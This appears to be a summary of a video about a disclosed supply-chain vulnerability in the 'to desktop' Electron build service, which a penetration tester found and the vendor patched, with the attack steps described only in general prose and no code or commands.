The video discusses a security vulnerability discovered by penetration tester Eva, which affected applications like Cursor AI and Notion due to a flaw in the “to desktop” service used for building Electron apps, allowing for potential remote code execution. After identifying the vulnerability, Eva reported it, leading to prompt action from “to desktop” to patch the issue and enhance security measures, highlighting the crucial role of ethical hackers in improving software security.
The video discusses a significant security vulnerability reported by an anonymous penetration tester named Eva, which affected several popular applications, including Cursor AI and Notion. The vulnerability stemmed from a service called “to desktop,” which is used to build and create installers for Electron-based applications. This flaw allowed for remote code execution, meaning that malicious actors could potentially push harmful updates to users’ applications without their consent. The video emphasizes the importance of understanding such vulnerabilities, especially for those who may not be familiar with the technical details.
Eva’s investigation began when she noticed suspicious behavior while downloading the Cursor installer, which attempted to connect to a remote server. This led her to explore the “to desktop” service, which is backed by Y Combinator and helps developers package their Electron applications. Upon further inspection, she discovered that the service used Firebase for authentication, which raised red flags about its security practices. Eva conducted reconnaissance using developer tools to analyze the Firebase setup and found that the application had source maps enabled, making it easier to explore the code.
As Eva delved deeper, she identified an arbitrary S3 upload vulnerability within the “to desktop” CLI tool, which could allow unauthorized file uploads. This vulnerability was exacerbated by a post-install script in the package.json file that could be exploited to gain access to the build environment. By executing a reverse shell payload, Eva was able to establish a persistent connection to the container where applications were built, leading her to discover sensitive production credentials and a hardcoded Firebase admin key.
With access to these credentials, Eva realized she could deploy arbitrary updates to any application built using “to desktop,” effectively gaining remote code execution capabilities. This meant that she could push malicious updates to users without their knowledge, posing a significant risk to the security of those applications. The video highlights the potential impact of this vulnerability, suggesting that hundreds of millions of users could have been affected if it had not been addressed promptly.
Following Eva’s report, “to desktop” acted quickly to patch the vulnerability and implemented several security measures, including rotating keys and enhancing access controls. They engaged a third-party cybersecurity firm to audit their platform and introduced a security key requirement for app updates to ensure that only authorized releases could be pushed. The video concludes by acknowledging the importance of ethical hackers like Eva in identifying and reporting vulnerabilities, ultimately helping to improve the security of software applications.